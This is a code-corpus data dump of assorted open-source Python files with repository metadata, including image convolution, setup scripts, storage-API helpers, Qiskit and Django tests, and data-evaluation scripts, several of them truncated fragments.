] | 4 | 2021-04-27T10:34:45.000Z | 2021-08-31T16:40:28.000Z | src/prepare_data/task_prepare_r_effective_by_rki.py | covid-19-impact-lab/sid-germany | aef4bbfb326adaf9190c6d8880e15b3d6f150d28 | [
"MIT"
] | null | null | null | import pandas as pd
import pytask
from src.config import BLD
| 29.941176 | 85 | 0.732809 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
'''Mtodo encargado de realizar una convolucin a una imagen
Entrada:
Ioriginal - imagen original en forma de matrz
kernel - kernel para barrer la imagen
Salida:
res - imagen resultante'''
#fr - filas, cr - columnas
fr = len(Ioriginal)-(len(kernel)-1)
cr = len(Ioriginal[0])-(len(kernel[0])-1)
res = np.zeros((fr, cr))
#filas, matrz resultado
for i in range(len(res)):
#columnas, matrz resultado
for j in range(len(res[0])):
suma = 0
#filas, kernel
for m in range(len(kernel)):
#columnas, kernel
for n in range(len(kernel[0])):
suma += kernel[m][n] * Ioriginal[m+i][n+j]
res[i][j] = suma
return res | 26.961538 | 61 | 0.664765 |
0ce8bde6ed2f1bdf025074aeab207999685d2edc | 1,124 | py | Python | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | setup.py | viatoriche/vtr_utils | d877a97eabf57246cd73e975da5c56d6a343bba4 | [
"MIT"
] | null | null | null | import os
from distutils.core import setup
from setuptools import find_packages
package = 'vtr_utils'
version = "0.1.0"
packages = find_packages()
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
setup(
name=package,
version=version,
packages=packages,
package_data=get_package_data(package),
license='MIT',
author='viatoriche',
author_email='maxim@via-net.org',
description='Small utilities',
url='https://github.com/viatoriche/vtr_utils',
download_url='https://github.com/viatoriche/vtr_utils/tarball/{}'.format(version),
install_requires=['addict', 'pytz', 'six', 'pyunpack', 'patool'],
)
| 28.820513 | 86 | 0.662811 |
0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2 | 2,925 | py | Python | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 3 | 2022-02-08T18:03:44.000Z | 2022-03-18T18:10:43.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 19 | 2020-05-11T15:36:35.000Z | 2022-02-08T11:26:40.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | null | null | null | from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
| 31.793478 | 85 | 0.624274 |
0ce95b5923e81e3d937258cb29b18f328d097198 | 1,557 | py | Python | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | addons/website_sale_coupon/controllers/main.py | SHIVJITH/Odoo_Machine_Test | 310497a9872db7844b521e6dab5f7a9f61d365a4 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo.http import request
| 42.081081 | 95 | 0.680154 |
0ce9ddf8982fdd13b64038e356850186f884758e | 4,462 | py | Python | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/http_api/tests/test_views.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | from go.apps.tests.view_helpers import AppViewsHelper
from go.base.tests.helpers import GoDjangoTestCase
| 40.93578 | 72 | 0.61385 |
0ceb15471ca6941f1a3c2803a1bcd3575ac7f39e | 5,306 | py | Python | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 15 | 2020-05-06T23:46:44.000Z | 2021-12-14T08:04:48.000Z | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 2 | 2020-06-09T15:19:25.000Z | 2020-08-18T18:58:59.000Z | PyPowerStore/utils/helpers.py | dell/python-powerstore | 04d6d73e4c926cf0d347cf68b24f8f11ff80f565 | [
"Apache-2.0"
] | 5 | 2020-05-06T23:46:22.000Z | 2021-05-08T03:03:07.000Z | # -*- coding: utf-8 -*-
# Copyright: (c) 2019-2021, Dell EMC
"""Helper module for PowerStore"""
import logging
from pkg_resources import parse_version
provisioning_obj = None
def prepare_querystring(*query_arguments, **kw_query_arguments):
"""Prepare a querystring dict containing all query_arguments and
kw_query_arguments passed.
:return: Querystring dict.
:rtype: dict
"""
querystring = dict()
for argument_dict in query_arguments:
if isinstance(argument_dict, dict):
querystring.update(argument_dict)
querystring.update(kw_query_arguments)
return querystring
def get_logger(module_name, enable_log=False):
"""Return a logger with the specified name
:param module_name: Name of the module
:type module_name: str
:param enable_log: (optional) Whether to enable log or not
:type enable_log: bool
:return: Logger object
:rtype: logging.Logger
"""
LOG = logging.getLogger(module_name)
LOG.setLevel(logging.DEBUG)
if enable_log:
LOG.disabled = False
else:
LOG.disabled = True
return LOG
def is_foot_hill_or_higher():
"""Return a true if the array version is foot hill or higher.
:return: True if foot hill or higher
:rtype: bool
"""
foot_hill_version = '2.0.0.0'
array_version = provisioning_obj.get_array_version()
if array_version and (
parse_version(array_version) >= parse_version(foot_hill_version)):
return True
return False
def filtered_details(filterable_keys, filter_dict, resource_list,
resource_name):
"""
Get the filtered output.
:filterable_keys: Keys on which filters are supported.
:type filterable_keys: list
:filter_dict: Dict containing the filters, operators and value.
:type filter_dict: dict
:resource_list: The response of the REST api call on which
filter_dict is to be applied.
:type resource_list: list
:resource_name: Name of the resource
:type resource_name: str
:return: Dict, containing filtered values.
:rtype: dict
"""
err_msg = "Entered key {0} is not supported for filtering. " \
"For {1}, filters can be applied only on {2}. "
response = list()
for resource in resource_list:
count = 0
for key in filter_dict:
# Check if the filters can be applied on the key or not
if key not in filterable_keys:
raise Exception(err_msg.format(
key, resource_name, str(filterable_keys)))
count = apply_operators(filter_dict, key, resource, count)
if count == len(filter_dict):
temp_dict = dict()
temp_dict['id'] = resource['id']
# check if resource has 'name' parameter or not.
if resource_name not in ["CHAP config", "service config"]:
temp_dict['name'] = resource['name']
response.append(temp_dict)
return response
def apply_operators(filter_dict, key, resource, count):
"""
Returns the count for the filters applied on the keys
"""
split_list = filter_dict[key].split(".")
if split_list[0] == 'eq' and str(resource[key]) == str(split_list[1]):
count += 1
elif split_list[0] == 'neq' and str(resource[key]) != str(split_list[1]):
count += 1
elif split_list[0] == 'ilike':
if not isinstance(resource[key], str):
raise Exception('like can be applied on string type'
' parameters only. Please enter a valid operator'
' and parameter combination')
search_val = split_list[1].replace("*", "")
value = resource[key]
if split_list[1].startswith("*") and \
split_list[1].endswith("*") and \
value.count(search_val) > 0:
count += 1
elif split_list[1].startswith("*") and \
value.endswith(search_val):
count += 1
elif value.startswith(search_val):
count += 1
elif split_list[0] == 'gt':
if not isinstance(resource[key], (int, float)):
raise Exception('greater can be applied on int type'
' parameters only. Please enter a valid operator'
' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) < resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) < resource[key]:
count += 1
elif split_list[0] == 'lt':
if not isinstance(resource[key], (int, float)):
raise Exception('lesser can be applied on int type'
' parameters only. Please enter a valid operator'
' and parameter combination')
if isinstance(resource[key], int) and\
int(split_list[1]) > resource[key]:
count += 1
if isinstance(resource[key], float) and \
float(split_list[1]) > resource[key]:
count += 1
return count
| 35.373333 | 78 | 0.602714 |
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d | 5,680 | py | Python | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | 1 | 2021-06-13T10:00:44.000Z | 2021-06-13T10:00:44.000Z | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx | 42.074074 | 170 | 0.757394 |
0cec7a7b14ee446e6efc190805ad0c86fcf9567d | 2,565 | py | Python | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
| 34.2 | 100 | 0.665107 |
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9 | 7,039 | py | Python | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | 1 | 2021-07-29T13:23:58.000Z | 2021-07-29T13:23:58.000Z | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | import random
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458 | 76 | 0.356016 |
0cf0a226855cb91425b2c33151d95bfc025b95b0 | 624 | py | Python | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | 5 | 2021-03-02T09:04:07.000Z | 2022-01-25T09:58:16.000Z | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | 229 | 2020-09-30T15:08:39.000Z | 2022-03-31T14:23:55.000Z | tests/retrieve/test_segment.py | openghg/openghg | 9a05dd6fe3cee6123898b8f390cfaded08dbb408 | [
"Apache-2.0"
] | null | null | null | # import os
# import uuid
# import numpy as np
# import pandas as pd
# import pytest
# mocked_uuid = "00000000-0000-1111-00000-000000000000"
# @pytest.fixture(scope="session")
# def data():
# filename = "bsd.picarro.1minute.248m.dat"
# dir_path = os.path.dirname(__file__)
# test_data = "../data/proc_test_data/CRDS"
# filepath = os.path.join(dir_path, test_data, filename)
# return pd.read_csv(filepath, header=None, skiprows=1, sep=r"\s+")
# @pytest.fixture
# def mock_uuid(monkeypatch):
# def mock_uuid():
# return mocked_uuid
# monkeypatch.setattr(uuid, "uuid4", mock_uuid)
| 21.517241 | 71 | 0.674679 |
0cf19d7af68dc81b523b12d529be9b1094af28ac | 891 | py | Python | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
with open('README.md') as f:
long_description = f.read()
setup(
name='break_my_python',
version='0.0.2',
description='This package tries to breaks your python interpreter, do not install it',
long_description=long_description,
author='Jonathan J. Helmus',
author_email='jjhelmus@gmail.com',
url='http://pypi.python.org/pypi/break_my_python/',
license='LICENSE.txt',
py_modules=['break_my_python'],
data_files=[('/', ['break_my_python.pth'])],
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
| 31.821429 | 90 | 0.655443 |
0cf1bfd01d728cb0a54ff17ffb5bf2c3afbfaf92 | 12,039 | py | Python | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | 4 | 2018-05-28T05:05:01.000Z | 2020-03-24T15:01:24.000Z | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | null | null | null | n4ofunc/comp.py | noaione/n4ofunc | 81a69de67284f9685d1f88cb34f7d3d2d0ce19c1 | [
"MIT"
] | null | null | null | """
MIT License
Copyright (c) 2020-present noaione
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import shutil
import sys
from functools import partial
from pathlib import Path
from typing import Dict, Generator, List, NamedTuple, NoReturn, Optional, Tuple
import vapoursynth as vs
from vsutil import get_w, get_y
from .utils import has_plugin_or_raise
__all__ = (
"check_difference",
"save_difference",
"stack_compare",
"interleave_compare",
"compare",
)
core = vs.core
def stack_compare(
clips: List[vs.VideoNode],
height: Optional[int] = None,
identity: bool = False,
max_vertical_stack: int = 2,
interleave_only: bool = False,
):
"""
Stack/interleave compare multiple clips.
Probably inspired by LightArrowsEXE ``stack_compare`` function.
Clips are stacked like this:
-------------
| A | C | E |
-------------
| B | D | F |
------------- -- (For max_vertical_stack = 2)
etc...
If clips total are missing some, it'll add an extra BlankClip.
Formula: `multiples_of_max_vertical_stack[i] <= clip_total <= multiples_of_max_vertical_stack[i + 1]`
If one of the clips only have `Y` plane, all other clips will be changed to use only 1 plane
The total vertical clips can be modified using `max_vertical_stack`
Parameters
----------
clips: :class:`List[VideoNode]`
A collection of clips or sources to compare.
height: :class:`Optional[int]`
Resize the stacked compare into a new height.
If ``interleave_only`` is ``True``, this will be ignored.
identity: :class:`bool`
If ``True``, there will be numbering to identify each clips.
If ``interleave_only`` is ``True``, this will be ignored.
max_vertical_stack: :class:`int`
The maximum number of clips to stack vertically.
If ``interleave_only`` is ``True``, this will be ignored.
interleave_only: :class:`bool`
If ``True``, the output will be an interleaved comparision.
Returns
-------
:class:`VideoNode`
A stacked/interleaved compare of the clips.
"""
the_string = "ABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcefghijklmnopqrstuvwxyz"
if len(clips) < 2:
raise ValueError("stack_compare: please provide 2 or more clips.")
has_plugin_or_raise("sub")
# Check for luma only clip
only_use_luma = False
for clip in clips:
if clip.format.num_planes == 1:
only_use_luma = True
break
if interleave_only:
if only_use_luma:
clips = [get_y(clip) for clip in clips]
# Set identity
if identity:
clips = [
clip.sub.Subtitle(
_generate_ident(
idx,
clip.width,
clip.height,
)
)
for idx, clip in enumerate(clips)
]
return core.std.Interleave(clips, mismatch=True)
# Set YUV video to Y video if only_use_luma.
if only_use_luma:
clips = [get_y(clip) for clip in clips]
if identity:
clips = [
clip.sub.Subtitle(_generate_ident(ind, clip.width, clip.height)) for ind, clip in enumerate(clips)
]
# Find needed clip for current `max_vertical_stack`.
if len(clips) != max_vertical_stack:
needed_clip = _calculate_needed_clip(max_vertical_stack, len(clips))
f_clip = clips[0]
for _ in range(needed_clip - len(clips)):
clips.append(
core.std.BlankClip(f_clip).sub.Subtitle(
r"{\an5\fs120\b1\pos("
+ "{},{}".format(f_clip.width / 2, f_clip.height / 2)
+ r")}BlankClip Pad\N(Ignore)"
)
)
# Split into chunks of `max_vertical_stack` and StackVertical it.
# Input: [A, B, C, D, E, F, G, H]
# Output: [[A, B], [C, D], [E, F], [G, H]]
clips = [
core.std.StackVertical(clips[i : i + max_vertical_stack])
for i in range(0, len(clips), max_vertical_stack)
]
final_clip = core.std.StackHorizontal(clips) if len(clips) > 1 else clips[0]
if height:
if height != final_clip.height:
ar = final_clip.width / final_clip.height
final_clip = final_clip.resize.Bicubic(
get_w(height, ar),
height,
)
return final_clip
interleave_compare = partial(stack_compare, interleave_only=True)
compare = stack_compare
| 35.201754 | 110 | 0.631614 |
0cf20d68ff93bb50029ab4621417fc5c929819f7 | 11,612 | py | Python | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | mpas_analysis/ocean/time_series_sst.py | alicebarthel/MPAS-Analysis | a8c568180abf96879e890a73e848db58642cfdb6 | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # This software is open source software available under the BSD-3 license.
#
# Copyright (c) 2020 Triad National Security, LLC. All rights reserved.
# Copyright (c) 2020 Lawrence Livermore National Security, LLC. All rights
# reserved.
# Copyright (c) 2020 UT-Battelle, LLC. All rights reserved.
#
# Additional copyright and license information can be found in the LICENSE file
# distributed with this code, or at
# https://raw.githubusercontent.com/MPAS-Dev/MPAS-Analysis/master/LICENSE
from __future__ import absolute_import, division, print_function, \
unicode_literals
from mpas_analysis.shared import AnalysisTask
from mpas_analysis.shared.plot import timeseries_analysis_plot, savefig
from mpas_analysis.shared.time_series import combine_time_series_with_ncrcat
from mpas_analysis.shared.io import open_mpas_dataset
from mpas_analysis.shared.timekeeping.utility import date_to_days, \
days_to_datetime
from mpas_analysis.shared.io.utility import build_config_full_path, \
make_directories, check_path_exists
from mpas_analysis.shared.html import write_image_xml
# }}}
# vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| 38.072131 | 79 | 0.577678 |
0cf233053cbaff62ed1842427e42c01b9e93c0c4 | 3,682 | py | Python | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | codes/data_scripts/test_dataloader.py | DengpanFu/mmsr | addfabdaee86d2f9e41988dcfe92a817c5efe7ab | [
"Apache-2.0"
] | null | null | null | import sys
import os.path as osp
import math
import torchvision.utils
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from data import create_dataloader, create_dataset # noqa: E402
from utils import util # noqa: E402
if __name__ == "__main__":
main()
| 35.066667 | 99 | 0.528246 |
0cf243e0f912db385063a422e6bbf35dbe9d0972 | 3,663 | py | Python | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 58 | 2019-09-10T20:51:26.000Z | 2022-03-22T11:06:09.000Z | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 292 | 2019-07-23T04:33:18.000Z | 2021-07-26T04:28:22.000Z | python/iceberg/api/transforms/transforms.py | moulimukherjee/incubator-iceberg | bf7edc4b325df6dd80d86fea0149d2be0ad09468 | [
"Apache-2.0"
] | 26 | 2019-08-28T23:59:03.000Z | 2022-03-04T08:54:08.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
from .bucket import Bucket
from .dates import Dates
from .identity import Identity
from .timestamps import Timestamps
from .truncate import Truncate
from ..types import (TypeID)
"""
Factory methods for transforms.
<p>
Most users should create transforms using a
{@link PartitionSpec.Builder#builderFor(Schema)} partition spec builder}.
@see PartitionSpec#builderFor(Schema) The partition spec builder.
"""
| 32.705357 | 78 | 0.65329 |
0cf5f33e0cfd554440d95e9093a443f85242c9cf | 3,067 | py | Python | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | null | null | null | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | 3 | 2020-11-13T17:48:47.000Z | 2022-02-09T23:43:16.000Z | biocodes/re_eval.py | yjc9696/biobert-my | ffc11c91f7032cffbcc7d9526159f0ff8e08c1f3 | [
"Apache-2.0"
] | null | null | null | import argparse
import numpy as np
import pandas as pd
import sklearn.metrics
import sklearn.metrics
parser = argparse.ArgumentParser(description='')
parser.add_argument('--output_path', type=str, help='')
parser.add_argument('--answer_path', type=str, help='')
parser.add_argument('--task', type=str, default="binary", help='default:binary, possible other options:{chemprot}')
args = parser.parse_args()
testdf = pd.read_csv(args.answer_path, sep="\t")
preddf = pd.read_csv(args.output_path, sep="\t", header=None)
# binary
if args.task == "binary":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
pred_prob_one = [v[1] for v in pred]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=testdf["label"])
results = dict()
results["f1 score"] = f[1]
results["recall"] = r[1]
results["precision"] = p[1]
results["specificity"] = r[0]
# chemprot
# micro-average of 5 target classes
# see "Potent pairing: ensemble of long short-term memory networks and support vector machine for chemical-protein relation extraction (Mehryary, 2018)" for details
if args.task == "chemprot":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
for i, v in enumerate(sorted(testdf["label"].unique())):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
if args.task == "N2C2":
pred = [preddf.iloc[i].tolist() for i in preddf.index]
pred_class = [np.argmax(v) for v in pred]
str_to_int_mapper = dict()
labels = ["Reason-Drug", "Route-Drug", "Strength-Drug", "Frequency-Drug", "Duration-Drug", "Form-Drug", "Dosage-Drug", "ADE-Drug"]
for i, v in enumerate(labels):
str_to_int_mapper[v] = i
test_answer = [str_to_int_mapper[v] for v in testdf["label"]]
# print(sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[0, 1, 2, 3, 4, 5, 6, 7, 8], average="none"))
for i, label in enumerate(labels):
print(label + " result")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, labels=[i], average="macro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
print('\n')
print('total' + " result\n")
p, r, f, s = sklearn.metrics.precision_recall_fscore_support(y_pred=pred_class, y_true=test_answer, average="micro")
results = dict()
results["f1 score"] = f
results["recall"] = r
results["precision"] = p
for k, v in results.items():
print("{:11s} : {:.2%}".format(k, v))
| 41.445946 | 164 | 0.661559 |
0cf776032667c66aa9047465a936c18e4c0e130b | 99 | py | Python | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 2 | 2019-09-23T01:55:46.000Z | 2019-11-08T16:33:47.000Z | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 1 | 2019-10-07T01:11:55.000Z | 2019-10-07T01:11:55.000Z | mysite/ChainLicense/apps.py | Hwieun/ChainLicense | 35d552ff1cfd056584a54b946999ff287e87d8ad | [
"Apache-2.0"
] | 1 | 2019-09-24T06:22:30.000Z | 2019-09-24T06:22:30.000Z | from django.apps import AppConfig
| 16.5 | 36 | 0.777778 |
0cf9f78c1ecb148ea8cc9e86512596f09bae6846 | 1,403 | py | Python | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 6 | 2016-10-10T09:26:07.000Z | 2018-09-20T08:59:42.000Z | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 11 | 2016-10-10T12:11:07.000Z | 2018-05-09T22:11:02.000Z | tests/test_find_deployment.py | Suremaker/consul-deployment-agent | 466c36d3fcb9f8bfa144299dde7cb94f4341907b | [
"Apache-2.0"
] | 16 | 2016-09-28T16:00:58.000Z | 2019-02-25T16:52:12.000Z | # Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
from os.path import join
import unittest
from mock import patch
from agent.find_deployment import find_deployment_dir_win | 48.37931 | 127 | 0.726301 |
0cfa89782c8d3290c0c6ceba7319a0449a110fed | 2,585 | py | Python | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | null | null | null | model/embeddings.py | johnnytorres/crisis_conv_crosslingual | a30e762007e08190275bdd83af3c0bbc717fb516 | [
"MIT"
] | 1 | 2019-12-03T00:29:14.000Z | 2019-12-03T00:29:14.000Z | import os
import logging
import argparse
import numpy as np
import tensorflow as tf
from keras_preprocessing.text import Tokenizer
from tqdm import tqdm
from data import DataLoader
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)
logging.info('initializing task...')
parser = argparse.ArgumentParser()
parser.add_argument('--data-dir', default='data/claff-happydb')
parser.add_argument('--embeddings-path', type=str, default=None)
parser.add_argument('--num-unlabeled', type=int, default=1000)
parser.add_argument('--use-allfeats', action='store_true', default=False)
parser.add_argument('--predict', action='store_true', default=True)
builder = EmbeddingsBuilder(args=parser.parse_args())
builder.run()
logging.info('task finished...[ok]')
| 31.91358 | 109 | 0.635977 |
0cfa9b70f4dd085778dfa0f986d2747b6f89ea72 | 430 | py | Python | bin/ADFRsuite/CCSBpckgs/mglkey/__init__.py | AngelRuizMoreno/Jupyter_Dock_devel | 6d23bc174d5294d1e9909a0a1f9da0713042339e | [
